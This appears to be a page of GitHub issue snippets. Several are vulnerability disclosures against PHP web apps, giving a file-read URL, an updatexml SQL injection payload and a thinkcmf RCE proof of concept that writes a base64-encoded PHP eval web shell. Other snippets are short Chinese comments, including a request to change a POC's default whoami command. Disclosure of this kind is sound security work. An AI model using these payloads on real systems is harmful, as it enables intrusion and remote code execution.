liao10086
liao10086
有大小写组合的么
现在很多注册要求都是大小写组合的
I found an arbitrary file read vulnerability at V1.3 In the module of error log URL: http://localhost/index.php?m=admin&c=Tool&a=log&file=D%3A%5CphpStudy%5CWWW%5CSkycaijiApp%5CRuntime%5CLogs%5CAdmin%5C18_09_13.log The parameter of file can control,for example read index.php POC: suggest:limit the parameter...
hi: I found a sql injection vulnerability in /coreframe/app/order/admin/index.php  the parameter 'flag' didn't filtering of harmful input,so I can injection sql. payload like this: http://127.0.0.1/index.php?m=order&f=index&v=listing&_su=wuzhicms&flag= xxxx' or updatexml(1,concat(0x7e,(version())),0) or...
version: sftnow through 2018-12-29 There is a Remote Code Execution Vulnerability without login. Beacuse Framework used thinkcmf version is too low,it incloud a rce vulnerability. POC: ``` txt http://127.0.0.1:8888/?a=fetch&templateFile=public/index&prefix=''&content=file_put_contents('she.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3gnXSk7Pz4=')) ```...
原始请求  生成POC后  另外,大佬这个怎么自定义命令,默认是whoami,我测试的这个靶机没回显的,想修改为其他命令测试
安装的时候请求无效。正确填写了,环境都没问题